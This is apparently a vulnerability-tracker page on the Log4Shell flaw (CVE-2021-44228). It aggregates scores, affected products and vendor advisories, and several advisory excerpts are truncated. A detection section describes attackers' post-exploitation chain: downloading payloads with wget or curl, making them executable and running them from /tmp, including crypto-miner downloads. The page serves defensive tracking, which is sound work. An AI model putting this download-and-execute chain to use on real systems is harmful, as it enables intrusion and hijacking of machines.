CVE-2021-44228
published 2021-12-10CVE-2021-44228: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and…
PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2021-12-24
Exploited in the wild
EPSS
100.00%
100.0th percentile
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Affected
431 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alluxio | alluxio | < 2.7.3 | 2.7.3 |
| amazon | hotpatch | < 1.3.5 | 1.3.5 |
| amazon | log4jhotpatch | < 1.1-16 | 1.1-16 |
| amazon | log4jhotpatch | < 1.1-13 | 1.1-13 |
| amazon_web_services | log4j-cve-2021-44228-hotpatch | >= unspecified < 1.1-16 | 1.1-16 |
| apache | guacamole | — | — |
| apache | hadoop | — | — |
| apache | log4j | — | — |
| apache | log4j | — | — |
| apache | log4j | >= 2.0.1 < 2.3.1 | 2.3.1 |
| apache | log4j | >= 2.0.1 < 2.12.2 | 2.12.2 |
| apache | log4j | >= 2.13.0 < 2.15.0 | 2.15.0 |
| apache | log4j | >= 2.13.0 < 2.16.0 | 2.16.0 |
| apache | log4j | >= 2.4.0 < 2.12.2 | 2.12.2 |
| apache | logging | — | — |
| apache | ofbiz | — | — |
| apache | tika | — | — |
| apache | tomcat | — | — |
| apache_software_foundation | apache_log4j_1.x | >= 1.0.1 < unspecified | unspecified |
| apache_software_foundation | apache_log4j_1.x | >= unspecified < 2.0-alpha1 | 2.0-alpha1 |
| apple | xcode | < 13.3 | 13.3 |
| apple | xcode | — | — |
| bentley | synchro | >= 6.1 < 6.2.4.2 | 6.2.4.2 |
| bentley | synchro_4d | < 6.4.3.2 | 6.4.3.2 |
| cisco | advanced_malware_protection_virtual_private_cloud_appliance | < 3.5.4 | 3.5.4 |
Detection & IOCsextracted from sources · hover to see the quote
- →Post-exploitation activity following Log4Shell includes use of wget/curl to download payloads, chmod to set executable bit, and execution from /tmp — monitor for this combined tool chain. ↗
- →Post-exploitation XMRig miner binaries were downloaded from GitHub using curl after Log4Shell-style initial access; monitor for curl/wget calls to GitHub delivering ELF binaries. ↗
- ·CVE-2021-44228 (Log4Shell) affects Log4j 2.x; the related CVE-2021-4104 affects Log4j 1.2 only when JMSAppender is explicitly configured — it is not exploitable in default configurations. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
ghsa10.0CRITICAL
osv10.0CRITICAL
vulncheck10.0CRITICAL
cisa10.0CRITICAL
vendor_apache10.0CRITICAL
vendor_cisco10.0CRITICAL
vendor_debian10.0CRITICAL
vendor_msrc10.0CRITICAL
vendor_redhat10.0CRITICAL
vendor_ubuntu10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Apache Log4j2 Deserialization of Untrusted Data Vulnerability
cisa·2023-05-01·CVSS 10.0
CVE-2021-45046 [CRITICAL] CWE-917 Apache Log4j2 Deserialization of Untrusted Data Vulnerability
Vulnerability: Apache Log4j2 Deserialization of Untrusted Data Vulnerability
Affected: Apache Log4j2
Apache Log4j2 contains a deserialization of untrusted data vulnerability due to the incomplete fix of CVE-2021-44228, where the Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
Required Action: Apply updates per vendor instructions.
Notes: https://logging.apache.org/log4j/2.x/security.html; https://nvd.nist.gov/vuln/detail/CVE-2021-45046
Remediation Due Date: 2023-05-22
Apple
CVE-2022-22607: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2022-22607 [CRITICAL] CVE-2022-22607: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2022-22607
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
Apple
CVE-2022-22605: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2022-22605 [CRITICAL] CVE-2022-22605: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2022-22605
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
Apple
CVE-2021-44228: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE-2021-44228: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2021-44228
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
Apple
CVE-2022-22602: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2022-22602 [CRITICAL] CVE-2022-22602: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2022-22602
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
Apple
CVE-2022-22601: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2022-22601 [CRITICAL] CVE-2022-22601: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2022-22601
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
Apple
CVE-2022-22603: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2022-22603 [CRITICAL] CVE-2022-22603: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2022-22603
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
Apple
CVE-2022-22606: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2022-22606 [CRITICAL] CVE-2022-22606: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2022-22606
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
Apple
CVE-2022-22608: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2022-22608 [CRITICAL] CVE-2022-22608: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2022-22608
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
Apple
CVE-2022-22604: Xcode 13.3
vendor_apple·2022-03-14·CVSS 10.0
CVE-2022-22604 [CRITICAL] CVE-2022-22604: Xcode 13.3
Apple Security Update: About the security content of Xcode 13.3
Product: Xcode
Version: 13.3
CVE: CVE-2022-22604
Component: CVE-2021-44228
Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds checking.
CISA ICS
Sensormatic PowerManage (Update A)
cisa_ics·2022-02-03·CVSS 10.0
[CRITICAL] Sensormatic PowerManage (Update A)
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Sensormatic PowerManage (Update A)
Last RevisedMarch 08, 2022
Alert CodeICSA-22-034-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Sensormatic Electronics, LLC, a subsidiary of Johnson Controls Inc
- Equipment: PowerManage
- Vulnerability: Improper Input Validation
## 2. UPDATE INFORMATION
This update advisory is a follow-up to the original advisory titled ICSA-22-034-01 Sensormatic PowerManage that was published February 3, 2022, on the ICS webpage on www.cisa.gov/uscert.
## 3. RISK EVALUATION
Successful explo
Red Hat
log4j-core: remote code execution via JDBC Appender
vendor_redhat·2021-12-28·CVSS 6.6
CVE-2021-44832 [MEDIUM] CWE-20 log4j-core: remote code execution via JDBC Appender
log4j-core: remote code execution via JDBC Appender
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which
CISA ICS
Johnson Controls exacq Enterprise Manager
cisa_ics·2021-12-23·CVSS 10.0
[CRITICAL] Johnson Controls exacq Enterprise Manager
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Johnson Controls exacq Enterprise Manager
Last RevisedDecember 23, 2021
Alert CodeICSA-21-357-02
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Exacq Technologies, a subsidiary of Johnson Controls, Inc.
- Equipment: exacq Enterprise Manager
- Vulnerability: Improper Input Validation
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to enter malicious input resulting in remote code execution.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following versions of Exacq
Red Hat
log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern
vendor_redhat·2021-12-18·CVSS 5.9
CVE-2021-45105 [MEDIUM] CWE-835 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern
log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern
Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.
A flaw was found in the Apache Log4j logging library 2.x. when the logging configuration uses a non-default Pattern Layout with a Context Lookup. Attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup and can cause Denial of Service.
Statement: Red Hat Pro
VMware
VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities (CVE-2021-22056, CVE-2021-22057)
vendor_vmware·2021-12-17·CVSS 7.5
CVE-2021-22056 [HIGH] VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities (CVE-2021-22056, CVE-2021-22057)
VMSA-2021-0030: VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities (CVE-2021-22056, CVE-2021-22057)
VMware Workspace ONE Access and Identity Manager, contain a Server Side Request Forgery. VMware has evaluated this issue to be of Moderate severity with a maximum CVSSv3 base score of 5.5.
CVEs: CVE-2021-22056, CVE-2021-22057, CVE-2021-44228
Affected products: VMware Aria, VMware Cloud Foundation, VMware Identity Manager, VMware Workspace ONE, VMware vRealize
Ubuntu
Apache Log4j 2 vulnerability
vendor_ubuntu·2021-12-17
CVE-2021-44228 Apache Log4j 2 vulnerability
Title: Apache Log4j 2 vulnerability
Summary: Apache Log4j 2 could be made to crash or run programs as an administrator
if it received a specially crafted input.
USN-5192-1 fixed a vulnerability in Apache Log4j 2. This update provides
the corresponding update for Ubuntu 16.04 ESM.
Original advisory details:
Chen Zhaojun discovered that Apache Log4j 2 allows remote attackers to run
programs via a special crafted input. An attacker could use this vulnerability
to cause a denial of service or possibly execute arbitrary code.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046
vendor_redhat·2021-12-16·CVSS 8.1
CVE-2021-4125 [HIGH] kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046
kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046
It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all JndiLookup.class files were removed. This CVE only applies to the OpenShift Metering hive container images, shipped in OpenShift 4.8, 4.7 and 4.6.
It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all JndiLookup.class files were removed.
Statement: This CVE only applies to the OpenShift Metering hive container images, shipped in OpenShift 4.8, 4.7 and 4.6. The below previously shipped advisories were incomplete:
https://access.redhat.com/errata/RHSA-2021:5108
https://acc
Ubuntu
Apache Log4j 2 vulnerability
vendor_ubuntu·2021-12-15·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache Log4j 2 vulnerability
Title: Apache Log4j 2 vulnerability
Summary: Apache Log4j 2 could be made to crash if it received specially crafted input.
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was
incomplete in certain non-default configurations. An attacker could use this
vulnerability to cause a denial of service.
Please see the following link for more information:
https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Log4Shell
Instructions: In general, a standard system update will make all the necessary changes.
Microsoft
Apache Log4j Remote Code Execution Vulnerability
vendor_msrc·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache Log4j Remote Code Execution Vulnerability
Apache Log4j Remote Code Execution Vulnerability
Description: Certain versions of Apache Log4j2 are vulnerable to a remote code execution vulnerability. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Microsoft is not aware of any impact to the security of our enterprise services and has not experienced any degradation in the reliability or availability of those services as a result of this vulnerability.
The Microsoft services detailed in the Security Updates table require customers to take action by downloading and installing security updates to mitigate the risks posed by this vulnerability on their deployments. Other Microsoft services require customers to apply configur
Red Hat
log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)
vendor_redhat·2021-12-14·CVSS 10.0
CVE-2021-45046 [CRITICAL] CWE-917 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)
log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup pat
Ubuntu
Apache Log4j 2 vulnerability
vendor_ubuntu·2021-12-14
CVE-2021-44228 Apache Log4j 2 vulnerability
Title: Apache Log4j 2 vulnerability
Summary: Apache Log4j 2 could be made to crash or run programs as an administrator
if it received a specially crafted input.
Chen Zhaojun discovered that Apache Log4j 2 allows remote attackers to run
programs via a special crafted input. An attacker could use this vulnerability
to cause a denial of service or possibly execute arbitrary code.
Please see the following link for more information:
https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Log4Shell
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
vendor_redhat·2021-12-10·CVSS 7.5
CVE-2021-44228 [HIGH] CWE-20 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Ser
VMware
VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046)
vendor_vmware·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046)
VMSA-2021-0028: VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046)
Description Multiple products impacted by remote code execution vulnerabilities via Apache Log4j (CVE-2021-44228, CVE-2021-45046).
CVEs: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105
Affected products: ESXi, NSX Data Center, NSX-T, VMware Aria, VMware Carbon Black, VMware Cloud Foundation, VMware HCX, VMware Horizon, VMware Identity Manager, VMware NSX, VMware SD-WAN, VMware Tanzu, VMware VeloCloud, VMware Workspace ONE, VMware vCenter Server, VMware vRealize, VMware vSphere
Cisco
Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
vendor_cisco·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
Critical Vulnerabilities in Apache Log4j Java Logging Library
On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed:
CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints
On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:
CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack
On December 18, 2021, a vulnerability in the Apache Log4j component affecting vers
CISA
Apache Log4j2 Remote Code Execution Vulnerability
cisa·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Apache Log4j2 Remote Code Execution Vulnerability
Vulnerability: Apache Log4j2 Remote Code Execution Vulnerability
Affected: Apache Log4j2
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
Required Action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Remediation Due Date: 2021-12-24
Palo Alto
Impact of Log4j Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832
vendor_paloalto·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-94 Impact of Log4j Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832
Impact of Log4j Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832
Apache Log4j Java library is vulnerable to a remote code execution vulnerability CVE-2021-44228, known as Log4Shell, and related vulnerabilities CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. Log4Shell allows remote unauthenticated attackers with the ability to inject text into log messages to execute arbitrary code loaded from malicious servers with the privileges of the process utilizing Log4j.
These products and services are not affected by Log4Shell: Bridgecrew, Cortex Data Lake, Cortex XDR agents, Cortex XSOAR, Cortex Xpanse, Enterprise Data Loss Prevention (DLP), Expedition, the GlobalProtect app, IoT Security, Okyo Garde, PAN-DB Private Cloud, PAN-OS software running on firewall
Red Hat
log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender
vendor_redhat·2021-12-10·CVSS 7.5
CVE-2021-4104 [HIGH] CWE-20 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender
log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSAppender
Debian
CVE-2021-4104: apache-log4j1.2 - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when...
vendor_debian·2021·CVSS 7.5
CVE-2021-4104 [HIGH] CVE-2021-4104: apache-log4j1.2 - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when...
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
Scope: local
bookworm: resolved (fixed in 1.2.17-11)
bullseye: resolved (fixed in 1.2.17-10+deb11u1)
forky: resolved (fixed in 1.2.17-11)
sid: resolved (fixed in 1.2.17-11)
trixie
Debian
CVE-2021-44228: apache-log4j1.2 - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12...
vendor_debian·2021·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE-2021-44228: apache-log4j1.2 - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12...
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixi
Debian
CVE-2021-45046: apache-log4j2 - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was i...
vendor_debian·2021·CVSS 10.0
CVE-2021-45046 [CRITICAL] CVE-2021-45046: apache-log4j2 - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was i...
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
Scope: local
bookworm: resolved (fixed in 2.16.0-1)
bullseye: resolved (fixed
Apache
Apache tika: CVE-2021-44228
vendor_apache
CVE-2021-44228 [CRITICAL] Apache tika: CVE-2021-44228
Apache tika: CVE-2021-44228
Critical Remote Code Execution in log4j2 ??? 2.0.0-BETA-2.1.0
Severity: critical
Apache
Apache ofbiz: CVE-2021-44228
vendor_apache
CVE-2021-44228 Apache ofbiz: CVE-2021-44228
Apache ofbiz: CVE-2021-44228
; affected all releases before 17.12.09 and 18.12.03; fixed in 17.12.09 and 18.12.03 with commits 00896e7 , c69bc8f , bccf140
Cisco
Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
vendor_cisco·CVSS 3.1
CVE-2021-45105 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
CVE-2021-45105: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
Critical Vulnerabilities in Apache Log4j Java Logging Library On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack On December 18, 2021, a vulnerability in the Apache Log4j component affe
Cisco
Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
vendor_cisco·CVSS 3.1
CVE-2021-44228 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
CVE-2021-44228: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
Critical Vulnerabilities in Apache Log4j Java Logging Library On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack On December 18, 2021, a vulnerability in the Apache Log4j component affe
Apache
Apache guacamole: CVE-2021-44228
vendor_apache
CVE-2021-44228 Apache guacamole: CVE-2021-44228
Apache guacamole: CVE-2021-44228
No, CVE-2021-44228 does not affect Apache Guacamole. Guacamole uses Logback as its logging backend, not Log4j.
Apache
Apache tomcat: CVE-2021-44228
vendor_apache·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache tomcat: CVE-2021-44228
Apache tomcat: CVE-2021-44228
Apache Tomcat 8.5.x has no dependency on any version of log4j. Web applications deployed on Apache Tomcat may have a dependency on log4j. You should seek support from the application vendor in this instance. It is possible to configure Apache Tomcat 8.5.x to use log4j 2.x for Tomcat's internal logging. This requires explicit configuration and the addition of the log4j 2.x library. Anyone who has switched Tomcat's internal logging to log4j 2.x is likely to need to address this vulnerability. The first few releases of 8.5.x (8.5.3 and earlier) provided optional support for switching Tomcat's internal logging to log4j 1.x. Anyone one using these very old (5+ years), unsupported versions of Tomcat that switched to using log4j 1.x may need to address this vulnerabi
Cisco
Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
vendor_cisco·CVSS 3.1
CVE-2021-44832 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
CVE-2021-44832: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
Critical Vulnerabilities in Apache Log4j Java Logging Library On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack On December 18, 2021, a vulnerability in the Apache Log4j component affe
Apache
Apache logging: CVE-2021-44228
vendor_apache
CVE-2021-44228 [CRITICAL] Apache logging: CVE-2021-44228
Apache logging: CVE-2021-44228
Summary JNDI lookup can be exploited to execute arbitrary code loaded from an LDAP server CVSS 3.x Score & Vector 10.0 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Components affected log4j-core Versions affected [2.0-beta9, 2.3.1) ∪ [2.4, 2.12.2) ∪ [2.13.0, 2.15.0) Versions fixed 2.3.1 (for Java 6), 2.12.2 (for Java 7), and 2.15.0 (for Java 8 and later)
Severity: critical
Affected versions: 2.3.1
Cisco
Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
vendor_cisco·CVSS 3.1
CVE-2021-45046 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
CVE-2021-45046: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
